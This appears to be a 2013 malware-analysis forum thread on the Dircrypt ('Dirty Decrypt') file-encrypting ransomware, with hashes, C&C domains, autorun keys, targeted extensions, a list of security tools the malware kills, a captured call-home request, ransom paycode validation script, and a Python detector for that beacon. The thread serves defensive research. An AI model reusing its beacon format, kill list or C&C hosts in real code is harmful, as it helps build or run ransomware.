Win32/Dircrypt (File Encrypting Ransomware)

Forum for analysis and discussion about malware.

Dirty Alert Ransomware

Postby Cody Johnston » Thu Jul 04, 2013 8:18 pm

Hello,

Picked this one up from a customer PC today. Has disturbing images on the front (blocked of course).

Image

It encrypts all of the files and gives a message to run the "Dirty Decrypt.exe" (enclosed in the archive).

Image

Dirty Decrypt.exe

Image

VT: 3/47

https://www.virustotal.com/en/file/ac995a703e528e67cb41489dcaa57f2ef7cb3174990bf8b30f69dfaae8ea4e37/analysis/

MD5: 4bb6c6c3f1ad7c2fb6096f6156c1df9b

Dropper, Dirty Decrypt.exe, and Sample encrypted pdf file enclosed. I do not have the original pdf file unfortunately. Happy 4th of July! :mrgreen:
Cody Johnston

Re: Dirty Alert Ransomware

Postby thisisu » Fri Jul 05, 2013 12:42 am

Autorun entries created and some code found in index.html.

Code: Select all
   // RepeatSymbol(n, d) is not part of the snippet; presumably it returns the digit d repeated n times.
   function Validation(paycode, system)
   {
      if (system == "psk") {
         // Note: the pattern is passed as a string, not a regex literal, so this
         // match can never succeed and the all-digits check is effectively a no-op.
         if (paycode.length != 16 || paycode.match("/^\d+$/")) return false;
         if (paycode.charAt(0) != "0") return false;
         for (var j = 0; j <= 9; j++)
            if (paycode.indexOf(RepeatSymbol(5, j)) != -1) return false;
         if (paycode.match("1234567")) return false;
         return true;
      } else if (system == "moneypak") {
         // Same string-instead-of-regex pattern as above.
         if (paycode.length < 14 || paycode.length > 25 || paycode.match("/^\d+$/")) return false;
         for (var j = 0; j <= 9; j++)
            if (paycode.indexOf(RepeatSymbol(5, j)) != -1) return false;
         if (paycode.match("1234567")) return false;
         return true;
      }
      return false;
   }
thisisu

Re: Dirty Alert Ransomware

Postby Fabian Wosar » Sun Jul 07, 2013 9:39 pm

You can find the unpacked sample attached. C&C server appears to be pdstriker.com. The communication protocol appears to be protected using RSA. The public keys used for the communication can be found inside the resources, together with the C&C server as well as a whole bunch of different files containing the ransom note in various formats that the malware overwrites encrypted files with.

Files seem to be encrypted with RSA as well, which means decryption without the private key is not feasible. Don't quote me on that just yet though. I am kind of tired and only had a few minutes to look at the file. Will take a closer look tomorrow.
Best regards,

Fabian Wosar [Development]
Emsisoft Team - www.emsisoft.com
Fabian Wosar

Win32/Dircrypt (File Encrypting Ransomware)

Postby EP_X0FF » Wed Jul 24, 2013 5:31 am

Uses CryptoAPI, is WOW64 compatible (can handle FS redirection), and appears to use a client-server RSA key decryption scheme.
It is aware of certain applications' process names and attempts to terminate them in the usual way.
Autoruns through the usual entries: Software\Microsoft\Windows\CurrentVersion\Run, Software\Microsoft\Windows NT\CurrentVersion\Winlogon (UserInit value) and the Start menu autorun folder.

Code: Select all
.data:0041B434                                         ; "wscsvc"
.data:0041B438                 dd offset aWindefend    ; "WinDefend"
.data:0041B43C                 dd offset aWuauserv     ; "wuauserv"
.data:0041B440                 dd offset aMpssvc       ; "MpsSvc"
.data:0041B448                                         ; "taskmgr"
.data:0041B44C                 dd offset aFilemon      ; "filemon"
.data:0041B450                 dd offset aTcpview      ; "tcpview"
.data:0041B454                 dd offset aFilemon_0    ; "filemon"
.data:0041B458                 dd offset aProcexp      ; "procexp"
.data:0041B45C                 dd offset aProcmon      ; "procmon"
.data:0041B460                 dd offset aRegmon       ; "regmon"
.data:0041B464                 dd offset aWireshark    ; "wireshark"
.data:0041B468                 dd offset aLordpe       ; "LordPE"
.data:0041B46C                 dd offset aRegedit      ; "regedit"


Targets following file extensions:

Code: Select all
.jpg
.jpeg
.png
.doc
.rtf
.zip
.7z
.pdf
.docx
.docm
.xls
.xlsx
.xlsm
.rar
.avi
.mpeg
.mpg
.wmv


Example of "call home":

Code: Select all
POST / HTTP/1.1
Host: viweabkkfe.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)
Content-Type: multipart/form-data; boundary=AIXvIEELixblffGFsogn
Content-Length: 261
Accept-Language: en-us
Accept: text/html, application/xml;q=0.9, application/xhtml+xml;q=0.9, image/png, image/jpeg, image/gif, image/x-xbitmap, *\*;q=0.1
Accept-Charset: utf-8, utf-16;q=0.6, *;q=0.1
Pragma: no-cache
Connection: close

--removed
Content-Disposition: form-data; name="cmd"

ld
--removed
Content-Disposition: form-data; name="botid"

removed
--removed
Content-Disposition: form-data; name="lid"

0
--removed--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 24 Jul 2013 GMT
Content-Type: application/octet-stream
Content-Length: 191
Connection: close
X-Powered-By: PHP/5.3.25
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 24 Jul 2013 GMT
Cache-Control: max-age=0
Pragma: no-cache

f~Б*;F
ж–КУњЂвѕjjЙ(tТ=Ґ»*А¤‹3Emпq‚tKЙ ^CЯcїє”ФґФQ:jћ-‚ќоNА^ѓ\щЋ™u¦љєboиoЯџСМЦ•wз:`”џVПiЫ№Р%Є‚є?©‘я¤€•ҐХ9Ы 0©RчЫ:“”•Њ
T’6­У\h¬ЛЎ1i%нѕ3Ц1ЯП'#W4gn0vxвЈСЃ   FґтшГxL;ъ“ЧH‚


Attached:
1) original dropper
2) decrypted dropper (note the additional tiny trojan downloader in the overlay)
3) extracted additional resources, including the ransomware pictures and the second trojan (notificator)

Always use backups.

VT
original
https://www.virustotal.com/en/file/e908284c087983e3b9f3a3b828f1a3812bfe0e77694b9ef943c0e5c90eb747bb/analysis/

deobfuscated
https://www.virustotal.com/en/file/9c67320f0a29796abfb5b53ef2fa2fbcb56b33cff6cdb3f96a8d303685e17263/analysis/
Ring0 - the source of inspiration
EP_X0FF
Global Moderator
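A detection helper for the beacon shape in the call-home capture above, added here as an example (it is not code from the thread or from the malware): it parses a constructed request whose multipart field names (cmd, botid, lid), boundary format, "ld" command and MASE User-Agent mirror the post, and flags that combination. The host and botid values in the sample are placeholders.

```python
import re

# Constructed sample request modelled on the capture in the post; field names,
# the "ld" command and the User-Agent are from the post, host/botid are placeholders.
SAMPLE_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: cnc.example.invalid\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)\r\n"
    b"Content-Type: multipart/form-data; boundary=AIXvIEELixblffGFsogn\r\n"
    b"\r\n"
    b"--AIXvIEELixblffGFsogn\r\n"
    b'Content-Disposition: form-data; name="cmd"\r\n\r\nld\r\n'
    b"--AIXvIEELixblffGFsogn\r\n"
    b'Content-Disposition: form-data; name="botid"\r\n\r\nBOTID_PLACEHOLDER\r\n'
    b"--AIXvIEELixblffGFsogn\r\n"
    b'Content-Disposition: form-data; name="lid"\r\n\r\n0\r\n'
    b"--AIXvIEELixblffGFsogn--\r\n"
)

def split_request(raw: bytes):
    """Return (lower-cased header dict, raw body) of an HTTP request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:            # skip the request line
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def parse_multipart(body: bytes, boundary: str) -> dict:
    """Minimal multipart/form-data parser: field name -> text value."""
    fields = {}
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):                  # closing delimiter
            break
        part_head, _, value = chunk.strip(b"\r\n").partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', part_head)
        if match:
            fields[match.group(1).decode()] = value.decode("latin-1").strip()
    return fields

def classify(raw: bytes) -> dict:
    """Flag the Dircrypt beacon shape: MASE User-Agent plus cmd/botid/lid fields."""
    headers, body = split_request(raw)
    match = re.search(r"boundary=([^;\s]+)", headers.get("content-type", ""))
    fields = parse_multipart(body, match.group(1)) if match else {}
    indicators = []
    if headers.get("user-agent", "").endswith("MASE)"):
        indicators.append("user-agent ends with MASE")
    if {"cmd", "botid", "lid"}.issubset(fields):
        indicators.append("cmd/botid/lid form fields")
    if fields.get("cmd") == "ld":
        indicators.append("cmd=ld as in the capture")
    return {"fields": fields, "indicators": indicators, "suspicious": len(indicators) >= 2}
```

Run it over the bodies of proxy-logged POSTs; two or more indicators on one request is the shape worth alerting on, a single one is too weak on its own.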

Re: Win32/Dircrypt (File Encrypting Ransomware)

Postby Fabian Wosar » Wed Jul 24, 2013 7:21 am

An earlier variant of this particular malware was already uploaded here:
viewtopic.php?f=16&t=2822

Nothing else to add really, as your observations are pretty much identical with what I saw back then.
Best regards,

Fabian Wosar [Development]
Emsisoft Team - www.emsisoft.com
Fabian Wosar

Re: Win32/Dircrypt (File Encrypting Ransomware)

Postby EP_X0FF » Wed Jul 24, 2013 7:57 am

Thanks, threads merged.
Ring0 - the source of inspiration
EP_X0FF
Global Moderator

Re: Win32/Dircrypt (File Encrypting Ransomware)

Postby Blaze » Fri Aug 09, 2013 9:51 am

New(er) variant on this one? Locks all files (PDF, DOC, JPG, ...) as usual and displays a message when trying to open the file.
Image

Found some info on Malekal's forum: http://forum.malekal.com/decrypter-fich ... ml#p348572
The encryption algorithm in the program is quite tricky: it stores the key used for file encryption in encrypted form, and the key can be decrypted back only on the server side, in case the user has already paid.
The encryption algorithm, RC4 + RSA1024, can't be cracked.


DirtyDecrypt.exe itself was not present on the system anymore(?). Also, registry files were dropped to C:\Programdata, but these were already deleted by the user as well. These probably contain encryption algorithms for different file types.

Attached is a sample, which Microsoft detects as Trojan:Win32/Dircrypt.A. Unsure how the malware entered, very likely through an EK which loaded a Java exploit. I will attach the spl0its found on that system in the correct topic: http://kernelmode.info/forum/viewtopic.php?f=16&t=1819

According to Kaspersky (quote above) it's encrypted with RC4 + RSA1024 so I don't have my hopes up high to help the user in this case. System restore does not solve the issue. Tried some ransomware decryptors, but since they're for specific malware families, they were not able to solve the issue either. I'm now trying to recover the files with PhotoRec.

Any help and/or insight on this issue is appreciated. Dropper attached. MD5: 7a3c8d7f8b2b5bd26995dd33f4c1ee3c
Follow me on Twitter: @bartblaze
Blaze

Re: Win32/Dircrypt (File Encrypting Ransomware)

Postby Artilllerie » Fri Aug 09, 2013 1:28 pm

Hello,

Maybe some useful tips:

1- DirtyDecrypt.exe is packed with UPX.

2- Confirmed to use RSA:
Image

3- Uses a specific user-agent:
Image

4- Bot ID reference here (and other parts):
Image

5- Just type 14 characters for the MoneyPak test:
Image

Shows "Connection error", but no packet was sniffed on my side.

That's all for the quick first look.
Artilllerie

Re: Win32/Dircrypt (File Encrypting Ransomware)

Postby Blaze » Mon Aug 12, 2013 9:43 am

Thanks Artilllerie for this quick glance! Have you been able to study this one further?
Follow me on Twitter: @bartblaze
Blaze

Re: Win32/Dircrypt (File Encrypting Ransomware)

Postby Artilllerie » Thu Aug 29, 2013 10:21 am

Sorry for the late answer, Blaze!

Nothing new about it for me, but I think there is not very much to study. I agree with Kaspersky: the key is generated and stored on the server side, and without it we cannot decrypt the data.

If I find something new I will keep you posted!
Artilllerie